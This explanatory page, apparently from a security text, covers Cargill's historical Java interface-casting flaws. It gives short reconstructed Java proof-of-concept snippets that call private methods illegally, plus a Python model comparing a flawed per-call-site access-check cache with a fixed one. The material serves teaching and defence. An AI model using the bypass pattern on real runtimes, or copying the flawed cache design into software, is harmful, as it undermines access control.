Interface Attacks
Simple Interface Casting
The core of Cargill's first discovery is shown in the following code (the body of Secure and the call in Attack are reconstructed from the description that follows):

    interface Inter { void foo(); }

    class Secure implements Inter {
        private void foo() { /* sensitive code */ }
    }

    class Attack {
        public static void main(String[] args) {
            Inter i = new Secure();
            i.foo();   // the interpreter should reject this call
        }
    }

This code allows the private foo method of class Secure to be called illegally. The Java interpreter fails to check whether foo is private when i.foo() is called through the interface type.
As a result, any private method that implements an interface method can be called from anywhere. In the example above, the private method foo can be called directly from an applet.
Advanced Interface Casting
Here is the core of Cargill's second discovery (again, the method bodies and the loop are reconstructed from the description that follows):

    interface Inter { void foo(); }

    class Secure implements Inter {
        private void foo() { /* sensitive code */ }
    }

    class Hostile implements Inter {
        public void foo() { }

        public static void main(String[] args) {
            Inter[] inter = { new Hostile(), new Secure() };
            for (int i = 0; i < inter.length; i++) {
                inter[i].foo();   // legal for inter[0], illegal for inter[1]
            }
        }
    }

The first call, inter[0].foo(), is legal because Hostile's foo method is public. The next time around the loop, inter[1].foo() is illegal because Secure's foo method is private.
In this case, Java was too clever for its own good. To improve performance, the interpreter checked the call's legality only the first time through the loop, on the assumption that what was legal once would remain legal. That assumption usually holds, but it breaks down for the code above, where the receiver's class changes from one iteration to the next while the call site stays the same.
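To show why the second attack works, here is an added Python model (not Cargill's code and not the JDK's) of interface dispatch with a per-call-site cache: the flawed version remembers only that a call site passed its check, while the fixed version keys the cached verdict on the receiver's class. The class names and the call-site label are taken from the snippet above; everything else is assumed for illustration.

```python
class AccessError(Exception):
    """Raised when a private method is invoked from outside its own class."""


class Method:
    def __init__(self, owner, private):
        self.owner, self.private = owner, private

    def __call__(self):
        return f"{self.owner}.foo"


# Both classes implement Inter: Hostile.foo is public, Secure.foo is private.
IMPLEMENTATIONS = {
    "Hostile": Method("Hostile", private=False),
    "Secure": Method("Secure", private=True),
}


def check_access(receiver_class, caller_class):
    # The legality check the interpreter must apply to every interface call.
    m = IMPLEMENTATIONS[receiver_class]
    if m.private and caller_class != receiver_class:
        raise AccessError(f"{receiver_class}.foo is private")
    return m


def invoke_buggy(cache, site, receiver_class, caller_class):
    """Flawed dispatch: checks legality only the first time a call site runs."""
    if site not in cache:
        check_access(receiver_class, caller_class)
        cache[site] = True   # remembers "legal" but not for which receiver class
    return IMPLEMENTATIONS[receiver_class]()


def invoke_fixed(cache, site, receiver_class, caller_class):
    """Sound dispatch: the cached verdict is keyed on (site, receiver class)."""
    key = (site, receiver_class)
    if key not in cache:
        cache[key] = check_access(receiver_class, caller_class)
    return cache[key]()


def run_loop(invoke, receivers=("Hostile", "Secure"), caller="Hostile"):
    """Models the page's loop: inter[0] is a Hostile, inter[1] is a Secure."""
    cache, results = {}, []
    for r in receivers:
        results.append(invoke(cache, "inter[i].foo()", r, caller))
    return results


def loop_rejected(invoke):
    # True if the dispatch strategy stops the loop from reaching Secure.foo.
    try:
        run_loop(invoke)
    except AccessError:
        return True
    return False
```

A current javac rejects a private implementation of an interface method outright (weaker access than the interface declares), so the Java snippets no longer compile as written; the model isolates the runtime check they exercised.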